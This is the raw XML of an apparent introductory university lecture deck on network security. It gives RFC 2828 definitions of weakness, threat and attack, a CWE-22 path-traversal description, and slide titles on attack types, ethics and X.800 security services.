            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>programmers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>users [Blue Team] </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12406">
            <a:off x="6197599" y="810496"/>
            <a:ext cx="2794001" cy="152825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908720"/>
            <a:ext cx="2879576" cy="1794936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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232" y="1628800"/>
            <a:ext cx="2157553" cy="2157553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="One Team, Two Team, Red Team, Blue Team (And Also Purple Team): | by  Mackenzie Pech | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42865541-07C2-4552-87C9-8BEB51E678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952" y="3063676"/>
            <a:ext cx="4332412" cy="3608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2531">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22531">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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6" presetClass="emph" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22531">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22531">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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26" presetClass="emph" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22531">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22531">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>DICTIONARY – II  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>RfC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t> 2828)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0"/>
              <a:t>consider 3 aspects of information security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0"/>
              <a:t>security attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0"/>
              <a:t>security mechanism (detection, prevention, recover)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0"/>
              <a:t>security service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0"/>
              <a:t>note terms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" i="1" dirty="0"/>
              <a:t>weakness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0"/>
              <a:t>a general conduct which may lead to generation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0"/>
              <a:t>threats </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" i="1" dirty="0"/>
              <a:t>threat/vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0"/>
              <a:t> a specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0"/>
              <a:t>potential for violation of security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" i="1" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0"/>
              <a:t>assault on system security, a deliberate attempt to evade security services</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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WEAKNESS – EXAMPLE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>CWEs</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171003384"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323840" y="1791146"/>
          <a:ext cx="8686800" cy="854075"/>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854075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="2800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000066"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-22</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="2800" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="15240" marR="15240" marT="15251" marB="15251" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="15240" marR="15240" marT="15251" marB="15251"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Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3501008"/>
            <a:ext cx="7992888" cy="322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lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>CVEs</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1557338"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://goo.gl/88zUlr</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\AgelinBee\Dropbox\Screenshot\Screenshot 2015-10-06 13.39.57.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="8321" r="25684" b="6278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1691680" y="2585830"/>
            <a:ext cx="6164282" cy="3984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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Segnaposto contenuto 9" descr="Ritaglio schermata"/>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 y="1673352"/>
            <a:ext cx="8282880" cy="1538248"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Immagine 11" descr="Ritaglio scherm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56" y="3393704"/>
            <a:ext cx="5905769" cy="3132209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31075703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iaro">
  <a:themeElements>
    <a:clrScheme name="Chiaro">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o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ar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5366</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>401</Paragraphs>
  <Slides>47</Slides>
  <Notes>38</Notes>
  <HiddenSlides>23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Arial</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Chiaro</vt:lpstr>
      <vt:lpstr>Network &amp; Security  An introduction</vt:lpstr>
      <vt:lpstr>Information</vt:lpstr>
      <vt:lpstr>Exam procedure</vt:lpstr>
      <vt:lpstr>Course Program</vt:lpstr>
      <vt:lpstr>DICTIONARY - I</vt:lpstr>
      <vt:lpstr>DICTIONARY – II  (RfC 2828)</vt:lpstr>
      <vt:lpstr>WEAKNESS – EXAMPLE - CWEs</vt:lpstr>
      <vt:lpstr>THREAT – EXAMPLE - CVEs</vt:lpstr>
      <vt:lpstr>ATTACK - EXAMPLE</vt:lpstr>
      <vt:lpstr>Key Security Concepts</vt:lpstr>
      <vt:lpstr>DICTIONARY - III</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Some false myths:</vt:lpstr>
      <vt:lpstr>Risk estimate</vt:lpstr>
      <vt:lpstr>Two different attack perspectives</vt:lpstr>
      <vt:lpstr>Example of massive attack: phishing</vt:lpstr>
      <vt:lpstr>PARANOID vs unsecured</vt:lpstr>
      <vt:lpstr>Computer Security Challenges</vt:lpstr>
      <vt:lpstr>Passive Attacks</vt:lpstr>
      <vt:lpstr>Active Attacks</vt:lpstr>
      <vt:lpstr>Model for Network Security</vt:lpstr>
      <vt:lpstr>Model for Network Access Security</vt:lpstr>
      <vt:lpstr>Ethical Issues: can I «check» someone else’s system with no authorization?</vt:lpstr>
      <vt:lpstr>FAQ: Professional certifications</vt:lpstr>
      <vt:lpstr>Security Service</vt:lpstr>
      <vt:lpstr>Security Services (X.800)</vt:lpstr>
      <vt:lpstr>Security Mechanism</vt:lpstr>
      <vt:lpstr>Security Mechanisms (X.800)</vt:lpstr>
      <vt:lpstr>FOOD of the day</vt:lpstr>
      <vt:lpstr>LOGICAL FALLACY of the day</vt:lpstr>
      <vt:lpstr>LOGICAL FALLACY of the day</vt:lpstr>
      <vt:lpstr>Cryptography and Network Security Chapter 1</vt:lpstr>
      <vt:lpstr>Roadmap</vt:lpstr>
      <vt:lpstr>Standards Organizations</vt:lpstr>
      <vt:lpstr>Chapter 1 – Introduction</vt:lpstr>
      <vt:lpstr>Computer Security</vt:lpstr>
      <vt:lpstr>Levels of Impact</vt:lpstr>
      <vt:lpstr>Examples of Security Requirements</vt:lpstr>
      <vt:lpstr>OSI Security Architecture</vt:lpstr>
      <vt:lpstr>Security Services</vt:lpstr>
      <vt:lpstr>Model for Network Security</vt:lpstr>
      <vt:lpstr>Model for Network Access Security</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>FOOD of the day</vt:lpstr>
      <vt:lpstr>NERD THING of the day</vt:lpstr>
      <vt:lpstr>THREAT - EXAMPLE</vt:lpstr>
      <vt:lpstr>ATTACK -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&amp; Security  An introduction</dc:title>
  <dc:creator>Giovambattista Ianni</dc:creator>
  <cp:lastModifiedBy>Giovambattista Ianni</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-24T12:26:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-06T16:02:41Z</dcterms:modified>
</cp:coreProperties>
</file>